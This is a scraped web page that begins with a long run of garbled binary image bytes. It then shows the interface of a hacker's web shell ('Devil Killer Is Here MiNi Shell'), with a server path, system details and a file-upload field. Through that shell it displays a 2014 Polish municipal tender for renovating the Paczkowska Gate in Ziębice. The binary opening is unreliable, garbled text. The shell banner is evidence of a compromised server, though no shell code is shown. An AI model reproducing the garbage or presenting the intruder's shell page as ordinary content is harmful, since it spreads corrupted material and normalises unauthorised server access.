JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140912/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140912/305128-N-2014.html

<p class="kh_header"><b>Ziębice: REMONT BRAMY PACZKOWSKIEJ W ZIĘBICACH - Etap IV Elewacja zewnętrzna, stolarka okienna i drzwiowa, instalacje.</b><br>
<b>Numer ogłoszenia: 305128 - 2014; data zamieszczenia: 12.09.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Ziębice , ul. Przemysłowa 10, 57-220 Ziębice, woj. dolnośląskie, tel. 074 8163870, faks 074 8191212.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ziebice.biuletyn.net</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> REMONT BRAMY PACZKOWSKIEJ W ZIĘBICACH - Etap IV Elewacja zewnętrzna, stolarka okienna i drzwiowa, instalacje..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> WSTĘP
Inwestycja  jest realizowana etapami  poprzez  roboty budowlane i prace konserwatorskie na obiekcie zabytkowym.

W roku 2013 zrealizowano:

Etap I - przebudowa stożka hełmu,  - zakres prac obejmował   
 - rozebranie części ceglanego stożka hełmu i jego przebudowę, konserwację  pozostałej części hełmu, konserwację i osadzenie kamiennej figury, wykonanie instalacji odgromowej,

Etap II - remont kondygnacji i krenelaża, - zakres prac obejmował                 
    - naprawę kamiennych ścian przejazdu bramnego, wykonanie żelbetowych stropów,  wymianę podłóg drewnianych, wykonanie żelbetowych schodów, naprawę tynków wewnętrznych i wykonanie malatury ścianę,  naprawę i konserwację krenelaża,     

W roku bieżącym jest obecnie realizowany Etap III w zakresie: 

Część 1 -  Naprawa odcinka muru obronnego od Bramy Paczkowskiej do ul. Bohaterów Getta w Ziębicach polegająca na; oczyszczeniu muru z porostów , uzupełnieniu brakujących kamieni, naprawie pęknięć, przemurowaniu rozwarstwień , przemurowaniu miejsc łatanych cegłą na wątek kamienny, przemurowaniu odcinka wtórnego zamurowania cegłą na mur kamienny, wykonaniu  łukowego przejścia dla pieszych w murze, domurowaniu kamieniem  muru do wymaganej wysokości i wyprofilowaniu spadku  dla wód opadowych. W części przylegającej do bramy należy wykonać ganek i mur obronny zwieńczyć blankowaniem  z cegły. Przeprowadzić kompleksową konserwację elewacji muru.
Część 2  - budowy zadaszonych  gontem schodów wejściowych zewnętrznych, budowa chodnika dydaktycznego  z kamiennej kostki brukowej  po obydwóch stronach muru, zagospodarowanie terenu zielenią.
Przedmiot zamówienia nie obejmuje  -  prac związanych z obiektem Bramy w zakresie robót wykonanych w wyżej wymienionych etapach oraz  montażu systemu osuszania, wyposażenia w sprzęt do transportu osób  niepełnosprawnych.

OPIS PRZEDMIOTU ZAMÓWIENIA:
Obiekt Bramy Paczkowskiej  znajduje się przy ul Grunwaldzkiej w Ziębicach i jest wpisany do rejestru zabytków decyzją z dnia 05.09.1960 r pod nr A/5190/729.
Obiekt mury obronne jest wpisany do rejestru zabytków decyzją z dnia 12.02.1956 r. pod nr A/2581/418

Zamawiający zapewnia osoby funkcyjne dla realizacji tego zadania w osobach: osobę nadzorującą prace konserwatorskie, inspektora nadzoru inwestorskiego, nadzór autorski  oraz nadzór archeologiczny.
Zamówienie  będzie prowadzone pod nadzorem Wojewódzkiego  Konserwatora Zabytków.
Inwestycja ma na celu działania zapewniające zachowanie dziedzictwa historycznego na terenie miasta Ziębice jak również ochronę zabytków i opiekę nad zabytkami.

Nazwa nadana zamówieniu: REMONT BRAMY PACZKOWSKIEJ W ZIĘBICACH - Etap IV Elewacja zewnętrzna, stolarka okienna i drzwiowa, instalacje.

Zakres Etapu IV obejmuje  elewację, stolarkę okienną i drzwiową, instalacje:
1) wykonanie robót budowlanych
- obejmujących  naprawę kamiennego   zewnętrznego  muru przyziemia bramy,  wymianę stolarki okiennej, wykonanie i montaż stolarki drzwiowej zewnętrznej wraz z przeszkleniem przejazdu bramnego, scalenie  kolorystyczne elewacji,  wykonanie przyłączenia elektrycznego  wraz   z zabudową rozdzielnicy RG,  wykonanie instalacji elektrycznej gniazdowej i oświetleniowej wraz  z  osprzętem i oprawami, wykonanie instalacji ochrony przeciwpożarowej SAP oraz instalacji oddymiania, wykonanie otworu drzwiowego wraz z montażem drzwi wejścia  z ganku do Bramy . 
2) wykonanie prac konserwatorskich
- obejmujących naprawę elewacji zewnętrznej (tynków, boni, elementów metalowych rozet ściągów),  odtworzenie kartuszy - herbów na elewacji zewnętrznej.

Szczegółowy opis przedmiotu zamówienia zawarty jest w: 
1) projekcie budowlanym - załącznik nr 9
2) projekcie wykonawczym - załącznik nr 10
3) projekt budowlano-wykonawczym - instalacje elektryczne załącznik nr 11
4) specyfikacji technicznej wykonania i odbioru robót STWiORB,załącznik nr 12        
5) przedmiarze robót - załącznik nr 13    
6) Program prac konserwatorskich- załącznik nr 14

Zamawiający informuje, że w przypadku wystąpienia w dokumentach odnoszących się do niniejszego przedmiotu zamówienia tj. w dokumentacjach projektowych, rysunkach technicznych, specyfikacjach technicznych, przedmiarach robót wskazania dotyczące znaków towarowych, patentów lub pochodzenia mają one jedynie charakter pomocniczy dla określenia podstawowych parametrów i cech zastosowanych materiałów. Zamawiający przyjmuje zastosowanie rozwiązań równoważnych przy realizacji przedmiotu zamówienia to znaczy takich samych lub lepszych pod względem jakości i funkcjonalności oraz warunków i kosztów eksploatacji jak te opisane w dokumentach odnoszących się do przedmiotu niniejszego Zamówienia. Produkt równoważny to taki, który ma te same cechy funkcjonalne, co wskazany, (jeżeli występuje) w dokumentacji projektowej konkretny z nazwy lub pochodzenia produkt. Jego jakość nie może być gorsza, od jakości określonego w specyfikacji produktu oraz powinien mieć parametry nie gorsze niż wskazany produkt. Nazwy własne w dokumentacji projektowej oraz w specyfikacji technicznej wykonania robót, przedmiarach robót - jeżeli występują nie są wiążące dla Wykonawcy, należy je traktować, jako materiały przykładowe do określenia parametrów i wymogów technicznych materiałów występujących w dokumentacji projektowej..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>ZAMAWIAJĄCY PRZEWIDUJE UDZIELENIE ZAMÓWIEŃ UZUPEŁNIAJĄCYCH Zamówienia uzupełniające zostaną udzielone na podstawie odrębnej umowy w trybie zamówienia z wolnej ręki na podstawie art. 67 ust 1 pkt 6 ustawy pzp. zamówienia uzupełniające mogą zostać udzielone w okresie 3 lat od udzielenia zamówienia podstawowego, dotychczasowemu wykonawcy usług, stanowiących nie więcej niż 50% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień zgodnych z przedmiotem zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.21.23.50-4, 45.00.00.00-7, 45.41.00.00-4, 45.42.11.00-5, 45.44.21.00-8, 45.44.30.00-4, 45.45.30.00-7, 45.31.00.00-3, 45.31.10.00-0, 45.31.12.00-0, 45.31.60.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.05.2015.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1. Zamawiający żąda od wykonawców wniesienia wadium w wysokości: 2000,00 zł (słownie: dwa tysiące złotych )
1) Wadium może być wnoszone w jednej lub w kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (t.j. Dz. U. 2007 r. Nr 42, poz. 275, z późn.zm).
2) Wadium należy wnieść przed  upływem terminu składania ofert w następujący sposób: 
a) w przypadku wadium wnoszonego w pieniądzu Wykonawca wpłaca wadium           w  wymaganej kwocie przelewem na rachunek bankowy Gospodarczy Bank Spółdzielczy w Strzelinie  Nr 36 9588 0004 0000 5555 2000 0050. W przypadku wadium wnoszonego w pieniądzu, jako termin wniesienia wadium przyjęty zostaje termin uznania kwoty na rachunku Zamawiającego. Zaleca się w tytule przelewu wpisać - Wadium na zabezpieczenie oferty Wykonawcy  (nazwa wykonawcy) dotyczącej przetargu (nazwa zadania).
b) w przypadku gwarancji i poręczeń należy oryginał dokumentu dołączyć do oferty jako osobny dokument nie wpięty do oferty i złożyć w jednej kopercie z ofertą (w sposób umożliwiający zwrot wadium) .  Dokument powinien określać:
-Zamawiającego - poprzez wskazanie zamawiającego jako podmiotu uprawnionego do wykonywania uprawnień wynikających z gwarancji,
-charakter gwarancji - poprzez stwierdzenie, że określona kwota pieniężna stanowi zabezpieczenie niezbędne do wzięcia udziału przez Wykonawcę X w konkretnym postępowaniu o udzielenie określonego zamówienia publicznego, 
-bezwarunkowe, nieodwołalne na każde pisemne żądanie zgłoszone przez Zamawiającego w terminie związania ofertą, zobowiązanie gwaranta/poręczyciela do wypłaty Zamawiającemu pełnej kwoty wadium w okolicznościach określonych w art. 46 ust.4a i 5 ustawy,
- termin obowiązywania gwarancji, poręczenia nie krótszy niż termin związania ofertą.
- Gwarancja lub poręczenie złożone przez podmioty wspólnie ubiegające się o udzielenie zamówienia muszą w swej treści zawierać zapis z którego wynika, iż wadium jest wnoszone w imieniu całego podmiotu wspólnie ubiegającego się o udzielenie zamówienia. 
3) nie wniesienie wadium w terminie lub w sposób określony w SIWZ spowoduje wykluczenie Wykonawcy na podstawie art. 24 ust. 2 pkt 2 ustawy. 
4) Zamawiający zwraca wadium wszystkim wykonawcom niezwłocznie po wyborze oferty najkorzystniejszej lub unieważnieniu postępowania, z wyjątkiem wykonawcy, którego oferta została wybrana jako najkorzystniejsza, z zastrzeżeniem ppkt 9
5) Wykonawcy, którego oferta została wybrana jako najkorzystniejsza, zamawiający zwraca wadium niezwłocznie po zawarciu umowy w sprawie zamówienia publicznego.
6) Zamawiający zwraca niezwłocznie wadium na wniosek wykonawcy, który wycofał ofertę przed upływem terminu składania ofert.
7) Zamawiający żąda ponownego wniesienia wadium przez wykonawcę, któremu zwrócono wadium na podstawie ppkt. 4 jeżeli w wyniku rozstrzygnięcia odwołania jego oferta została wybrana jako najkorzystniejsza. Wykonawca wnosi wadium w terminie określonym przez zamawiającego.
8) jeżeli wadium wniesiono w pieniądzu, zamawiający zwraca je wraz z odsetkami wynikającymi  umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszty prowadzenia rachunku bankowego oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy wskazany przez wykonawcę.
9) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi  na wezwanie, o którym mowa w art. 26 ust. 3, nie złożył dokumentów lub oświadczeń, o których mowa w art. 25 ust. 1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nieleżących po jego stronie.
10) Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca, którego oferta została wybrana:
a) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie;
b) nie wniósł wymaganego zabezpieczenia należytego wykonania umowy;
c) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie wykonawcy.
11)	okres ważności wadium: Wykonawca zabezpiecza ofertę wymaganą kwotą wadium na okres 30 dni licząc od daty upływu terminu składania ofert. 
12)	z postępowania wyklucza się wykonawców którzy nie wnieśli wadium do upływu terminu składania ofert, na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3, albo nie zgodzili się na przedłużenie okresu związania ofertą. Ofertę wykonawcy wykluczonego z postępowania uznaje się za odrzuconą.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże, iż wykonał w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie  
a)	w zakresie robót budowlanych
- co najmniej dwóch robót polegających na wykonaniu/wymianie instalacji elektrycznej                            o wartości co najmniej 10 000,00 zł każda,
- co najmniej dwóch robót budowlanych polegających na montażu stolarki okiennej i /lub drzwiowej w ilości co najmniej 10 sztuk dla każdej roboty.

b)	w zakresie prac konserwatorskich 
- co najmniej dwóch prac związanych z naprawą/ uzupełnieniem/ konserwacją tynków.
- co najmniej dwóch prac związanych z konserwacją/odtworzeniem elementów sztukaterii elewacji  

W przypadku wykonawców którzy wykażą roboty budowlane  w innych walutach niż złoty polski zamawiający przeliczy podane kwoty po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje warunku.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli Wykonawca wykaże, że dysponuje, co najmniej: 

jedną osobą posiadającą uprawnienia do pełnienia samodzielnych funkcji technicznych  w budownictwie do kierowania robotami budowlanymi w specjalności konstrukcyjno - budowlanej bez ograniczeń,   które uprawniają do pełnienia funkcji kierownika budowy, oraz odbytą co najmniej dwuletnią praktykę zawodową na budowie przy zabytkach nieruchomych wpisanych do rejestru zabytków, 

jedną osobą, -  konserwatora do prowadzenia prac konserwatorskich, który posiada:  
-	tytuł zawodowy magistra uzyskany po ukończeniu studiów wyższych na kierunku konserwacja i restauracja dzieł sztuki lub w specjalności w zakresie konserwacji zabytków
oraz odbyła po ukończeniu tych studiów co najmniej 12-miesięczną praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków;
-	w  dziedzinach nieobjętych programem studiów wyższych, o których mowa powyżej, prace konserwatorskie może prowadzić osoba, która posiada: świadectwo ukończenia szkoły średniej zawodowej oraz tytuł zawodowy albo wykształcenie średnie i dyplom potwierdzający posiadanie kwalifikacji zawodowych w zawodach odpowiadających danej dziedzinie lub dyplom mistrza w zawodzie odpowiadającym danej dziedzinie
oraz odbyła co najmniej 5-letnią praktykę zawodową w zakresie konserwacji lub badania zabytków wpisanych do rejestru zabytków.

Zamawiający zaleca, aby wykonawca dołączył dokumenty potwierdzające uprawnienia i doświadczenie  kierownika budowy oraz aktualny wpis na listę członków właściwej izby oraz dokumenty potwierdzające kwalifikacje i doświadczenie konserwatora prac konserwatorskich
Dokumenty będą pomocne przy sprawdzeniu czy Wykonawca spełnia warunki udziału w postępowaniu. Nie dołączenie powyższych dokumentów nie będzie skutkować wykluczeniem wykonawcy czy odrzuceniem oferty.

Jednocześnie osoby spełniające powyższy warunek to również osoby, których odpowiednie kwalifikacje zostały uznane na zasadach określonych w przepisach odrębnych za równoważne.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony jeśli wykonawca wykaże, iż posiada środki finansowe lub zdolność kredytową na kwotę nie mniejszą niż 150.000,00 PLN
W przypadku podmiotów wspólnie ubiegających się o udzielenie zamówienia przy ocenie spełniania warunku udziału w postępowaniu potencjał ekonomiczny i finansowy będzie podlegał sumowaniu
W przypadku wykonawców którzy wykażą posiadanie środków finansowych lub zdolności kredytowej w innych walutach niż złoty polski zamawiający przeliczy podane kwoty po średnim kursie NBP z dnia ukazania się ogłoszenia o zamówieniu. 

W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, warunki określone w ust 1 pkt 1-4 winien spełniać co najmniej jeden Wykonawca lub wszyscy Wykonawcy wspólnie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz z załączeniem dowodów dotyczących najważniejszych robót, określających, czy roboty te zostały wykonane w sposób należyty oraz wskazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone;</li>

<li  style="margin-bottom: 12px;">określenie robót budowlanych, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o robotach budowlanych niewykonanych lub wykonanych nienależycie<br>Zamawiający określa, że robotami budowlanymi, których  dotyczy obowiązek wykazania przez wykonawcę w wykazie i złożenie dla nich poświadczeń, dotyczy:
a)	w zakresie robót budowlanych:
-   co najmniej dwóch robót polegających na wykonaniu/wymianie instalacji elektrycznej o wartości co najmniej 10 000,00 zł każda;
-  co najmniej dwóch robót budowlanych polegających na montażu stolarki okiennej i /lub drzwiowej w ilości co najmniej 10 sztuk dla każdej roboty;
b)   w zakresie prac konserwatorskich:
-   co najmniej dwóch prac związanych z naprawą/ uzupełnieniem/ konserwacją tynków;
- co najmniej dwóch prac związanych z konserwacją/odtworzeniem elementów sztukaterii elewacji; 
Zamawiający nie wymaga informacji o robotach budowlanych niewykonanych lub   wykonanych nienależycie.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową innego podmiotu, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

